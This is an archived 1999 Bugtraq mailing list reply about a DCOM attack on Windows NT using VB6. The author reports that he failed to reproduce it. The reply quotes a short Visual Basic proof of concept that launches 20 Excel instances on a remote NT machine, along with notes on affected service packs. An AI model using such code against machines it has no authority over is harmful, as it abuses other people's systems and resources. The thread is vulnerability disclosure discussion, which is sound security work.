Bugtraq mailing list archives
Re: FW: DCOM attack against NT using VB6
From: erik () ERIKNIELSEN COM (Erik Nielsen)
Date: Thu, 19 Aug 1999 18:09:42 -0700
First off, Could not run the program without proper permission on the target machine. Then, could not recreate on SP3 or SP4. The program just went through it's paces with no action resulting. Targets were NT 4 with SP3 and SP4, both with Office 97 Source machine was WIN95 OSR2 with VB6 SP3.
Using the code below I was able to create 20 instances of Excel on my co-workers machines without modifying their machines at all. The target must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to prevent the attack. Private Sub Command1_Click() Dim xlObj As Object Dim xlCollection As New Collection Dim i As Long For i = 1 To 20 Set xlObj = CreateObject("Excel.Application", "\\NTBox") xlCollection.Add xlObj Next i i = 1 'clean up While xlCollection.Count > 0 xlCollection.Remove (xlCollection.Count) Wend Set xlCollection = Nothing End Sub -Robert E. Lempke
Current thread:
- Re: DCOM attack against NT using VB6 Hargett, Matt (Aug 18)
- Re: FW: DCOM attack against NT using VB6 Max Vision (Aug 19)
- <Possible follow-ups>
- Re: FW: DCOM attack against NT using VB6 Erik Nielsen (Aug 19)
- Re: FW: DCOM attack against NT using VB6 Hargett, Matt (Aug 20)
- Re: FW: DCOM attack against NT using VB6 David LeBlanc (Aug 22)
- Re: DCOM attack against NT using VB6 Hargett, Matt (Aug 24)
- Re: FW: DCOM attack against NT using VB6 Russ (Aug 24)